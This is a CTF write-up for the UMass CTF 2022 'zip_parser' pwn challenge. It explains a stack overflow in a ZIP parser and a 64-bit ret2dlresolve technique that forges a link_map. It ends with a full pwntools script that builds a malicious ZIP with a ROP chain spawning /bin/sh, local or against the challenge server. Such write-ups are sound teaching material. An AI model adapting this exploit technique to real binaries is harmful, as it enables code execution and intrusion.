Advanced CTF Writeup: Exploiting Buffer Overflow in ZIP Parser with ret2dlresolve
ret2dlresolve on x86_64 with large gap between text and writable sections
- Challenge: zip_parser
- Category: pwn
- Points: 500
- Challenge Author: seal9055
- Solution: solve.py
When a tree falls in the forest with noone around to hear it, some say that no sound is made. Does the same apply to processes without output?
TL;DR
zip_parser
is a pwn challenge on UMass CTF 2022. The binary mimics a real world scenario of a zip parser that contains a buffer overflow vulnerability due to lack of boundary check. What makes the challenge extremely hard and non-trivial is that the binary doesn’t have any output function loaded on the GOT, which makes it impossible to leak any memory before exploitation. ret2dlresolve attack is a suitable solution in such scenario.
Also, yet the pwntools automation functions for ret2dlresolve works well for this challenge, it doesn’t work for some 64-bit binaries with large gap between text and writable sections. I used an approach of manually forging link_map to deal with such issue.
In this writeup, I will go through the thought process from developing this challenge, and including a detailed explanation to my approach of ret2dlresolve and multiple counterpart approaches.
Static Analysis
To investigate the challenge binary, we can begin with some checksec and reverse engineering.
checksec
Reversing
Loading up the binary in Ghidra gives us a pretty messy decompiled code at first. But reversing engineering won’t be the majority of this writeup, so I’d quickly go through the decompiled code and talk about what could we do to exploit it.
main()
main()
function is the entry point to the binary. It read the size of zip file first, and then read the zip file. It parses End of Central Directory, Central Directory, Local Header in order after read.
parse_head()
Recall the layout of zip file and End of central directory record ( EOCD)
parse_head()
search for the keyword 0x06054b50
that recognize EOCD and load useful information from it. The parsed data is then stored in a header struct that I defined in Ghidra to make the code more readable.
line 18 checks comp_size <= 0x80
, but it won’t be used anyway in the rest of the program.
parse_centdir()
parse_centdir()
parse n sections of Central directory file header.
parse_data()
parse_data()
read data from the Local file header, memcpy
the compressed data to a buffer on stack and then strcpy
it to a newly allocated buffer on heap.
Here comes our buffer flow vulnerability. The comp_size
is read in line 15 and 18 without any boundary check, and it could be a different number from the one loaded above by parser_centdir()
. So we are eventually able to read a large number of bytes from the zip file we make onto the stack, causing buffer overflow and executing our ROP exploitation.
Exploitation
The most intuitive method to spawn a shell by a ROP exploitation is ret2libc. But take a look at GOT via readelf -r chal
Relocation section '.rela.dyn' at offset 0x618 contains 5 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000403ff0 000400000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.2.5 + 0
000000403ff8 000700000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0
000000404080 000c00000005 R_X86_64_COPY 0000000000404080 stdout@GLIBC_2.2.5 + 0
000000404090 000d00000005 R_X86_64_COPY 0000000000404090 stdin@GLIBC_2.2.5 + 0
0000004040a0 000e00000005 R_X86_64_COPY 00000000004040a0 stderr@GLIBC_2.2.5 + 0
Relocation section '.rela.plt' at offset 0x690 contains 9 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000404018 000100000007 R_X86_64_JUMP_SLO 0000000000000000 strcpy@GLIBC_2.2.5 + 0
000000404020 000200000007 R_X86_64_JUMP_SLO 0000000000000000 setbuf@GLIBC_2.2.5 + 0
000000404028 000300000007 R_X86_64_JUMP_SLO 0000000000000000 read@GLIBC_2.2.5 + 0
000000404030 000500000007 R_X86_64_JUMP_SLO 0000000000000000 memcmp@GLIBC_2.2.5 + 0
000000404038 000600000007 R_X86_64_JUMP_SLO 0000000000000000 fgets@GLIBC_2.2.5 + 0
000000404040 000800000007 R_X86_64_JUMP_SLO 0000000000000000 memcpy@GLIBC_2.14 + 0
000000404048 000900000007 R_X86_64_JUMP_SLO 0000000000000000 malloc@GLIBC_2.2.5 + 0
000000404050 000a00000007 R_X86_64_JUMP_SLO 0000000000000000 atoi@GLIBC_2.2.5 + 0
000000404058 000b00000007 R_X86_64_JUMP_SLO 0000000000000000 exit@GLIBC_2.2.5 + 0
No print function is loaded to this binary. So we can’t leak the location of libc or further return to a system
libc call.
ret2dlresolve
After hours of googling, ret2dlresolve is the attack method that works if we can execute a ROP chain but can’t leak any address from memory.
I have found these online resources that are crucial for me to solve this challenge. (Bear with me the most useful one is in Chinese)
Very helpful Resources
- ret2dlresolve超详细教程(x86&x64) - the resource that I followed to develop this exploitation
- redpwnCTF 2021 - devnull-as-a-service (pwn) - clear and understandable explanation to ret2dlresolve
- 0ctf babystack with return-to dl-resolve - another understandable explanation to ret2dlresolve, but on x86
- ret2dlresolve利用方法 - explanation of ret2dlresolve with diagrams, but in Chinese and on x86
__dl_runtime_resolve
in short
In short, for a binary with Partial RELRO, when a function is about to be called for the first time, the dynamic linker need to load its address from the library. __dl_runtime_resolve(link_map, rel_offset)
is called to do the job.
To do so, the running program
- jumpy to
func@.plt
(using index 1 for example)-
0x401044
pushes the index 1 onto the stack, which is the index of such function on GOT, used asrel_offset
later
-
- jump to
.plt
-
0x401020
pushes0x404008 <_GLOBAL_OFFSET_TABLE_+0x8>
onto the stack, which is a pointer points to the turelink_map
inld.so
. -
0x401026
jump to*0x404010 <_GLOBAL_OFFSET_TABLE_+0x10>
, which is a pointer points to the actual address of__dl_runtime_resolve()
.
-
$ objdump -dS chal
...
Disassembly of section .plt:
0000000000401020 <.plt>:
401020: ff 35 e2 2f 00 00 pushq 0x2fe2(%rip) # 404008 <_GLOBAL_OFFSET_TABLE_+0x8>
401026: f2 ff 25 e3 2f 00 00 bnd jmpq *0x2fe3(%rip) # 404010 <_GLOBAL_OFFSET_TABLE_+0x10>
40102d: 0f 1f 00 nopl (%rax)
401030: f3 0f 1e fa endbr64
401034: 68 00 00 00 00 pushq $0x0
401039: f2 e9 e1 ff ff ff bnd jmpq 401020 <.plt>
40103f: 90 nop
401040: f3 0f 1e fa endbr64
401044: 68 01 00 00 00 pushq $0x1
401049: f2 e9 d1 ff ff ff bnd jmpq 401020 <.plt>
40104f: 90 nop
...
- inside
__dl_runtime_resolve()
,- pop the address of
link_map
andrel_offset
from the stack - locate the strut in
.dynamic
for.rel.plt
usinglink_map
- locate
.rel.plt
using data in.dynamic
andrel_offset
- locate
.symtab
using data in.rel.plt
- locate
.strtab
using data insymtab
and load its name, e.g. “system” - load the address of such function from the library into GOT
- pop the address of
- call the function with arguments in registers
ret2dlresolve in general
However, if we push a corrupt rel_offset
on stack first then directly return to .plt
, the resolver would use it to locate the fake .rel.plt
, fake .symtab
, fake .strtab
in order, and eventually load our desired function from the library instead of the supposed one.
Therefore, to conduct a ret2dlresolve, we only need to
- make up fake
.rel.plt
,.symtab
, and.strtab
tables carefully - write the fake tables to a writable area on stack, noted as
forged_area
- calculate
rel_offset = (forged_area - JMPREL) // <size of the struct>
, now the resolver would find our fake.rel.plt
table instead of the real one due to lack of boundary check. - make
rel_offset
the next value on stack - return to
.plt
, then the resolver should resolver our desired function and call it
This approach usually works well on 32-bit binary. After reading the source code of pwntools Ret2dlresolvePayload and rop.ret2dlresolve , I realized that this is also the general approach to conduct ret2dlresolve on 64-bit machine. But it doesn’t always work out.
Problems on 64-bit machine with large page
The above approach has problems for 64-bit binary with large gap between text and writable sections. _dl_fixup
plays a role here which is not an issue on 32-bit machines. It is explained in detail in redpwnCTF 2021 - devnull-as-a-service (pwn) ‘ s write up.
The problem with this attack is that _dl_fixup uses the same array index for both SYMTAB and VERSYM. Each element in each of these arrays is a different size (24 and 2 bytes, respectively), so using the same index for both results in vastly different addresses for the structs. In binaries with BSS close to the other sections, this can sometimes work out. However, in 64-bit binaries that use huge pages (so BSS is very far from the other sections), this guarantees a segmentation fault when trying to index VERSYM if the structs are placed in BSS.
This is the case where pwntools automation ret2dlresolve doesn’t work.
[!] Ret2dlresolve is likely impossible in this ELF (too big gap between text and writable sections).
If you get a segmentation fault with fault_addr = 0x42afd8, try a different technique.
pwntools automation ret2dlresolve solution
Fortunately, the binary for this challenge doesn’t have the issue above. Looking up the sections’ headers, we can tell .bss
is at 0x404080
and .rela.plt
is at 0x400690
.
$ readelf -S chal
There are 31 section headers, starting at offset 0x3c60:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
...
[11] .rela.plt RELA 0000000000400690 00000690
00000000000000d8 0000000000000018 AI 6 24 8
...
[26] .bss NOBITS 0000000000404080 00003070
0000000000000048 0000000000000000 WA 0 0 32
...
So the most intuitive solution to this challenge is to use pwntools automation ret2dlresolve functions. seal9055, the author of this challenge, gives his surprisingly nice and concise exploitation script by this method.
Another approach to ret2dlresolve - corrupt .dynamic
Another approach is described in redpwnCTF 2021 - devnull-as-a-service (pwn) . It makes a lot of confusion to me at first because he has a variable named link_map
in the exploitation. However, it turns out that he didn’t manually make a link_map
, but to corrupt the address of DT_STRTAB in .dynamic
and only make a fake .strtab
table with the string system
.
This approach seems much easier than the previous one, but the only problem is that it seems the .dynamic
section is not writable in most of the cases. I’m not sure if he successfully make the exploitation work.
Yet another approach to ret2dlresolve - manually forge link_map
Yet another idea is proposed by ret2dlresolve超详细教程(x86&x64) , and I didn’t find an English resource related to it.
The big idea comes from the implementation of _dl_fixup()
, we have to dive into the source code of it. I simplified the source code and add some comments for better understanding.
// https://code.woboq.org/userspace/glibc/elf/dl-runtime.c.html
_dl_fixup(struct link_map *l, ElfW(Word) reloc_arg) {
// Load address of DT_SYMTAB from link_map, DT_SYMTAB = 6
const ElfW(Sym) *const symtab = (const void *)D_PTR(l, l_info[DT_SYMTAB]);
// Load address of DT_SYMTAB from link_map, DT_STRTAB = 5
const char *strtab = (const void *)D_PTR(l, l_info[DT_STRTAB]);
// Load the coresponding struct from .rela.plt, DT_JMPREL = 23
const PLTREL *const reloc =
(const void *)(D_PTR(l, l_info[DT_JMPREL]) + reloc_offset);
// Load the coresponding struct from .symtab
const ElfW(Sym) *sym = &symtab[ELFW(R_SYM)(reloc->r_info)];
const ElfW(Sym) *refsym = sym;
void *const rel_addr = (void *)(l->l_addr + reloc->r_offset);
lookup_t result;
DL_FIXUP_VALUE_TYPE value;
/* Sanity check that we're really looking at a PLT relocation. */
// Check if the least bit of r_info is 7
assert(ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);
/* Look up the target symbol. If the normal lookup rules are not
used don't look in the global scope. */
// Check if sym->st_other == 0, normally it should be
if (__builtin_expect(ELFW(ST_VISIBILITY)(sym->st_other), 0) == 0) {
const struct r_found_version *version = NULL;
// Check if DT_VERSYM in link_map is NULL, normally it's not
if (l->l_info[VERSYMIDX(DT_VERSYM)] != NULL) {
/* ***********************************************************************
Segmentation fault: this is where ret2dlresolve doesn't work on 64-bit
machine with large page.
When executing vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff to compute
the version number, the big gap between BSS and SYMTAB makes
reloc->r_info too large and finally lead to a segmentation fault.
To work around it, the first choice is to make the DT_VERSYM in link_map
to be NULL. To do so, we need to leak the address of link_map, which
then we makes ret2dlresolve dumb.
The second choice is to make the outter if failed, so we need to set
sym->st_other (the 6th byte of the struct) not equals to 0, and jump to
the next else.
*********************************************************************** */
const ElfW(Half) *vernum =
(const void *)D_PTR(l, l_info[VERSYMIDX(DT_VERSYM)]);
ElfW(Half) ndx = vernum[ELFW(R_SYM)(reloc->r_info)] & 0x7fff;
version = &l->l_versions[ndx];
if (version->hash == 0) version = NULL;
}
/* We need to keep the scope around so do some locking. This is
not necessary for objects which cannot be unloaded or when
we are not using any threads (yet). */
int flags = DL_LOOKUP_ADD_DEPENDENCY;
if (!RTLD_SINGLE_THREAD_P) {
THREAD_GSCOPE_SET_FLAG();
flags |= DL_LOOKUP_GSCOPE_LOCK;
}
// The program won't crash in 32-bit machine and result is the successfully
// loaded base address of libc.
result = _dl_lookup_symbol_x(strtab + sym->st_name, l, &sym, l->l_scope,
version, ELF_RTYPE_CLASS_PLT, flags, NULL);
/* We are done with the global scope. */
if (!RTLD_SINGLE_THREAD_P) THREAD_GSCOPE_RESET_FLAG();
/* Currently result contains the base load address (or link map)
of the object that defines sym. Now add in the symbol
offset. */
// Similarly, on 32-bit machine, the function address is computed by
// value = result + st_value
value = DL_FIXUP_MAKE_VALUE(result, SYMBOL_ADDRESS(result, sym, false));
} else {
/* *************************************************************************
This is the key point for my approach, if we make the if statement above
failed, the function address is computed by
value = l->l_addr + st_value
Theoretically, we can contol these 2 parameter in .symtab and link_map and
resolve to the function that we need by set
l_addr = addr_system - addr_xxxx
and
value = addr_system - addr_xxxx + real_xxxx = real_system
************************************************************************* */
/* We already found the symbol. The module (and therefore its load
address) is also known. */
value = DL_FIXUP_MAKE_VALUE(l, SYMBOL_ADDRESS(l, sym, true));
result = l;
}
/* And now perhaps the relocation addend. */
value = elf_machine_plt_value(l, reloc, value);
if (sym != NULL &&
__builtin_expect(ELFW(ST_TYPE)(sym->st_info) == STT_GNU_IFUNC, 0))
value = elf_ifunc_invoke(DL_FIXUP_VALUE_ADDR(value));
/* Finally, fix up the plt itself. */
if (__glibc_unlikely(GLRO(dl_bind_not))) return value;
// FInally, write value into GOT
return elf_machine_fixup_plt(l, result, refsym, sym, reloc, rel_addr, value);
}
So our next goal is to forge link_map->l_addr
and sym->st_value
to be
link_map->l_addr = addr_system - addr_xxxx
sym->st_value = real_xxxx
and set the 6th byte of sym not equals to zero. So that we would have
value = addr_system - addr_xxxx + real_xxxx = real_system
as the resolved address. To do so, we need to refer to the struct used in .symtab
.
typedef struct {
Elf64_Word st_name; // 4 bytes /* Symbol name (string tbl index) */
unsigned char st_info; // 1 byte /* Symbol type and binding */
unsigned char st_other; // 1 byte /* Symbol visibility */
Elf64_Section st_shndx; // 2 bytes /* Section index */
Elf64_Addr st_value; // 8 bytes /* Symbol value */
Elf64_Xword st_size; // 8 bytes /* Symbol size */
} Elf64_Sym;
If we can make the DT_SYMTAB pointer points to xxxx@got - 0x8
after several look-ups, we will have st_value = real_xxxx
, and with great chane st_other != 0
.
With all theory set up, we are ready to forge the link_map
and other tables.
Forge link_map
Recall the struct of link_map
struct link_map {
/* Difference between the address in the ELF
file and the addresses in memory. */
Elf64_Addr l_addr; // 8 bytes
char *l_name; // 8 bytes /* Absolute file name object was found in. */
Elf64_Dyn *l_ld; // 8 bytes /* Dynamic section of the shared object. */
struct link_map *l_next; // 8 bytes /* Chain of loaded objects. */
struct link_map *l_prev; // 8 bytes /* Chain of loaded objects. */
/* All following members are internal to the dynamic linker.
They may change without notice. */
/* This is an element which is only ever different from a pointer to
the very same copy of this type for ld.so when it is used in more
than one namespace. */
struct link_map *l_real; // 8 bytes
/* Number of the namespace this link map belongs to. */
Lmid_t l_ns; // 8 bytes
/* Indexed pointers to dynamic section. */
struct libname_list *l_libname; // 8 bytes
// l_info contains all the sym tables, 77 * 8 bytes
// l_info[5] is ptr to DT_STRTAB
// l_info[6] is ptr to DT_SYMTAB
// l_info[23] is ptr to DT_JMPREL
Elf64_Dyn *l_info[77];
... size_t l_tls_firstbyte_offset;
ptrdiff_t l_tls_offset;
size_t l_tls_modid;
size_t l_tls_dtor_count;
Elf64_Addr l_relro_addr;
size_t l_relro_size;
unsigned long long l_serial;
struct auditstate l_audit[];
}
Here we only cares about
-
l_addr
at offset 0x0 -
l_info[5]
at offset 0x68 that points to.strtab
-
l_info[6]
at offset 0x70 that points to.symtab
-
l_info[23]
at offset 0xf8 that points to.rel.plt
BITMAP_64 = (1 << 64) - 1
# offset between system and target_func
target_func = 'atoi'
l_addr = libc.sym['system'] - libc.sym[target_func]
# link_map
link_map = flat({
0x0: l_addr & BITMAP_64, # l_addr
0x68: some_addr, # l_info[5], ptr to DT_STRTAB in _DYNAMIC
# we won't use it so any writable area
0x70: some_addr, # l_info[6], ptr to DT_SYMTAB in _DYNAMIC
0xf8: some_addr, # l_info[23], ptr to DT_JMPREL in _DYNAMIC
})
Forge DT_JMPREL, DT_SYMTAB, and DT_STRTAB
Tracking the link_map
on gdb
- GOT[2], ptr to
link_map
- the
link_map
-
l_info[23]
inlink_map
, ptr to DT_JMPREL in _DYNAMIC - DT_JMPREL in _DYNAMIC, ptr to DT_JMPREL. The struct contains
d_tag
, andd_val
, 16 bytes in total. - DT_JMPREL, the
.rel.plt
table, we can tell0x404018
at the first entry is the address forstrcpy@got
So we need to make a struct for fake _DYNAMIC, and a struct for fake .rel.plt
# DT_JMPREL in _DYNAMIC
_jmprel_dyn = flat([
0, # d_tag
some_addr # d_val, ptr to DT_JMPREL
])
# DT_JMPREL
jmprel = flat([
# normally this points to the real GOT, now we need an area to read/write.
some_addr, # rela->r_offset
7, # rela->r_info, 7>>32=0, points to index 0 of .symtab
0 # # rela->r_addend
]),
DT_SYMTAB and DT_STRTAB works almost the same. We need a struct for fake DT_SYMTAB in _DYNAMIC, a struct for fake .symtab
, and a \bin\sh\00
string.
Merge the forged tables together, we end up with the following forge_data
. For no good reason, I use .bss + 0x100
to write the forge data.
BITMAP_64 = (1 << 64) - 1
forge_area = elf.get_section_by_name(".bss")["sh_addr"] + 0x100
# offset between system and target_func
target_func = 'atoi'
l_addr = libc.sym['system'] - libc.sym[target_func]
forge_data = flat({
# link_map
0x0: l_addr & BITMAP_64, # l_addr
0x68: forge_area, # l_info[5], ptr to DT_STRTAB in _DYNAMIC
# we won't use it so any writable area
0x70: forge_area + 0x38, # l_info[6], ptr to DT_SYMTAB in _DYNAMIC
0xf8: forge_area + 0x8, # l_info[23], ptr to DT_JMPREL in _DYNAMIC
# _DYNAMIC
# for DT_JMPREL
0x8: flat([
0, # d_tag
forge_area + 0x18 # d_val, ptr to DT_JMPREL
]),
# for DT_SYMTAB
0x38: flat([
0, # d_tag
elf.got[target_func] - 0x8 # d_val, ptr to DT_SYMTAB
# s.t. st_value pts to the target function in GOT
]),
# DT_JMPREL
0x18: flat([
# normally this points to the real GOT, now we need an area to read/write.
forge_area - l_addr, # rela->r_offset
7, # rela->r_info, 7>>32=0, points to index 0 of .symtab
0 # # rela->r_addend
]),
# DT_STRTAB
0x48: b'/bin/sh\00',
})
Make ROP chain
The ROP chain would be relatively simple.
- read the
forge_data
into.bss + 0x100
- call
_dl_runtime_resolve
with the parameters and putrel_offset
andlink_map
on stack - align the stack if needed
rop = ROP([elf])
# bypass push link_map by adding 0x6 offset
resolver = elf.get_section_by_name(".plt")["sh_addr"] + 0x6
rop.read(0, forge_area, len(forge_data)) # read the link_map
rop.raw(rop.ret) # align stack to 0x10 to call system successfully
rop.call(resolver, [forge_area + 0x48]) # call system("/bin/sh")
rop.raw(forge_area) # link_map
rop.raw(0) # rel_offset
Construct zip file
Recall the zip file structure from above. Just need to be careful enough and follow the file structure, we can make a zip file with our ROP chain. The local buffer on parse_data
stack is located at rbp - 0xa0
, so we need 0xa8 bytes in compressed data to trigger the buffer overflow.
PH = b'A' # place holder
# Make compressed data
comp_data = PH * 0xa8
comp_data += rop.chain()
# 1. Make local file header
comp_size = len(comp_data)
len_file_name = 8 # for easier alignment
len_extra_field = 0
len_comment = 0
LFH = p32(0x04034b50)
LFH += PH * 14
LFH += p32(comp_size) # Compressed size
LFH += PH * 4
LFH += p16(len_file_name) # length file name
LFH += p16(len_extra_field) # length of extra field
LFH += PH * len_file_name # file name
LFH += PH * len_extra_field # extra field
# 2. Make Central directory file header
CDFH = p32(0x02014b50)
CDFH += PH * 16
CDFH += p32(0x40) # Compressed size, HACKED
CDFH += PH * 4
CDFH += p16(len_file_name) # File name length
CDFH += p16(len_extra_field) # Extra field length
CDFH += p16(len_comment) # File comment length
CDFH += PH * 8
CDFH += p32(0) # Relative offset of local file header.
CDFH += PH * len_file_name # file name
CDFH += PH * len_extra_field # extra field
CDFH += PH * len_comment # comment
# 3. Make End of central directory record (EOCD)
cd_size = len(CDFH)
# Offset of start of central directory, relative to start of archive
cd_offset = len(LFH) + len(comp_data)
EOCD = p32(0x06054b50) # End of central directory record
EOCD += PH * 6
# Total number of central directory records
EOCD += p16(1)
# Size of central directory (bytes)
EOCD += p32(cd_size)
# Offset of start of central directory, relative to start of archive
EOCD += p32(cd_offset)
EOCD += PH * 2
zip_file = LFH + comp_data + CDFH + EOCD
size_t = len(zip_file)
The final zip file is 394 bytes.
Send payloads
# Send size t
payload = str(size_t + 1).rjust(8, '0').encode()
io.send(payload)
# Send zip file with ROP
io.send(zip_file)
# Send fake link map
io.send(forge_data)
io.interactive()
At last, we just need to send the zip file with ROP included, and the program should read the forge_data
on to forge_area
. We can verify it in gdb that the program return to _dl_runtime_resolve
with the correct register and stack setup.
- pointer to the forge
link_map
is the first value on stack, followed by therel_offset = 0
- we can see the
l_addr
value matched -
/bin/sh
is on rdx
Therefore, we resolve to system
successfully with the desired parameter.
Execution
Finally, we finish our exploitation and everything is ready to go.
from pwn import *
PH = b'A'
context.terminal = ['tmux', 'splitw', '-h']
elf = context.binary = ELF('./chal')
libc = ELF('libc.so.6')
local = True
if local:
io = elf.process()
else:
host = '34.139.216.197'
port = 7293
io = remote(host, port)
if args.GDB:
gdb.attach(io, """
b *parse_data+522
c
n 14
""")
###############################################################################
# ret2dlresolve
###############################################################################
rop = ROP([elf])
# bypass push link_map by adding 0x6 offset
resolver = elf.get_section_by_name(".plt")["sh_addr"] + 0x6
forge_area = elf.get_section_by_name(".bss")["sh_addr"] + 0x100
SYMTAB = elf.dynamic_value_by_tag('DT_SYMTAB')
STRTAB = elf.dynamic_value_by_tag('DT_STRTAB')
JMPREL = elf.dynamic_value_by_tag('DT_JMPREL')
log.info('-' * 50)
log.info(f'_dl_resolve address: {hex(resolver)}')
log.info(f'.dynsym address: {hex(SYMTAB)}')
log.info(f'.dynstr address: {hex(STRTAB)}')
log.info(f'.rel.plt address: {hex(JMPREL)}')
log.info(f'writable buffer address: {hex(forge_area)}')
###############################################################################
# Forge link_map and other tables
###############################################################################
BITMAP_64 = (1 << 64) - 1
# offset between system and target_func
target_func = 'atoi'
l_addr = libc.sym['system'] - libc.sym[target_func]
log.info('-' * 50)
log.info('Making fake link_map')
log.info(f'system@libc - {target_func}@libc: {hex(l_addr)}')
forge_data = flat({
# link_map
0x0: l_addr & BITMAP_64, # l_addr
0x68: forge_area, # l_info[5], ptr to DT_STRTAB in _DYNAMIC
# we won't use it so any writable area
0x70: forge_area + 0x38, # l_info[6], ptr to DT_SYMTAB in _DYNAMIC
0xf8: forge_area + 0x8, # l_info[23], ptr to DT_JMPREL in _DYNAMIC
# _DYNAMIC
# for DT_JMPREL
0x8: flat([
0, # d_tag
forge_area + 0x18 # d_val, ptr to DT_JMPREL
]),
# for DT_SYMTAB
0x38: flat([
0, # d_tag
elf.got[target_func] - 0x8 # d_val, ptr to DT_SYMTAB
# s.t. st_value pts to the target function in GOT
]),
# DT_JMPREL
0x18: flat([
# normally this points to the real GOT, now we need an area to read/write.
forge_area - l_addr, # rela->r_offset
7, # rela->r_info, 7>>32=0, points to index 0 of .symtab
0 # # rela->r_addend
]),
# DT_STRTAB
0x48: b'/bin/sh\00',
})
log.info(f'Finish make the link_map, etc, size: {hex(len(forge_data))}')
rop.read(0, forge_area, len(forge_data)) # read the link_map
rop.raw(rop.ret) # align stack to 0x10 to call system successfully
rop.call(resolver, [forge_area + 0x48]) # call system("/bin/sh")
rop.raw(forge_area) # link_map
rop.raw(0) # rel_offset
###############################################################################
# Make zip file
###############################################################################
# Make compressed data
comp_data = PH * 0xa8
comp_data += rop.chain()
# 1. Make local file header
comp_size = len(comp_data)
len_file_name = 8 # for easier alignment
len_extra_field = 0
len_comment = 0
LFH = p32(0x04034b50)
LFH += PH * 14
LFH += p32(comp_size) # Compressed size
LFH += PH * 4
LFH += p16(len_file_name) # length file name
LFH += p16(len_extra_field) # length of extra field
LFH += PH * len_file_name # file name
LFH += PH * len_extra_field # extra field
# 2. Make Central directory file header
CDFH = p32(0x02014b50)
CDFH += PH * 16
CDFH += p32(0x40) # Compressed size, HACKED
CDFH += PH * 4
CDFH += p16(len_file_name) # File name length
CDFH += p16(len_extra_field) # Extra field length
CDFH += p16(len_comment) # File comment length
CDFH += PH * 8
CDFH += p32(0) # Relative offset of local file header.
CDFH += PH * len_file_name # file name
CDFH += PH * len_extra_field # extra field
CDFH += PH * len_comment # comment
# 3. Make End of central directory record (EOCD)
cd_size = len(CDFH)
# Offset of start of central directory, relative to start of archive
cd_offset = len(LFH) + len(comp_data)
EOCD = p32(0x06054b50) # End of central directory record
EOCD += PH * 6
# Total number of central directory records
EOCD += p16(1)
# Size of central directory (bytes)
EOCD += p32(cd_size)
# Offset of start of central directory, relative to start of archive
EOCD += p32(cd_offset)
EOCD += PH * 2
zip_file = LFH + comp_data + CDFH + EOCD
size_t = len(zip_file)
log.info(f'Finished making zip file, size: {size_t} bytes')
###############################################################################
# Execution
###############################################################################
log.info('-' * 50)
# Send size t
payload = str(size_t + 1).rjust(8, '0').encode()
io.send(payload)
# Send zip file with ROP
io.send(zip_file)
# Send fake link map
io.send(forge_data)
io.interactive()
Thoughts
It literally took me a whole day to research on ret2dlresolve and exploit the binary during the 48h competition. I didn’t completely understand what was going on even after I captured the flag. Then it took me another entire day to further dive into the topic and make this writeup.
I was surprised by seal0955’s solution that does the ret2dlresolve exploitation with only 2 pwntools functions. So I decide to dive in to see if my time deserved. It turns out that I was working on an approach that quite different from what pwntools does and deals with more stiff cases.
3 groups solved this challenge during the competition. One group successfully partially overwrite GOT and call system@libc
without ret2dlresolve.
I read through most of the 64-bit ret2dlresolve writeup from Google and didn’t see another one use a similar strategy that has to look into the source code implementation of _dl_fixup()
. So I decide to make this writeup more in details.
Limitation
- We have to know the libc version to calculate
l_addr
. It’s the same limitation to the partially overwrite GOT approach. But in theory, pwntools ret2dlresolve doesn’t need to know the libc version b/c it loads the function up by its name. - Not really some idea derived from theory. It really depends on the implementation of
ld.so
. So it probably won’t work for a different implementation ofld.so
. - To deal with the 2nd limitation, we probably could do something with the DT_VERSYM byte in
link_map
and we then need to worry about more parts in multiple sections, and I believe it won’t be easier than my approach. It also required to manually forgelink_map
anyway.
Reference
If you found this useful, please cite this as:
Wei, Guanghao (Apr 2022). Advanced CTF Writeup: Exploiting Buffer Overflow in ZIP Parser with ret2dlresolve. Gary Wei Machine Learning. https://acad.garywei.dev.
or as a BibTeX entry:
@article{wei2022advanced-ctf-writeup-exploiting-buffer-overflow-in-zip-parser-with-ret2dlresolve,
title = {Advanced CTF Writeup: Exploiting Buffer Overflow in ZIP Parser with ret2dlresolve},
author = {Wei, Guanghao},journal = {Gary Wei | Machine Learning},
year = {2022},
month = {Apr},
url = {https://acad.garywei.dev/blog/2022/ctf-zip-parser/}
}
Enjoy Reading This Article?
Here are some more articles you might like to read next: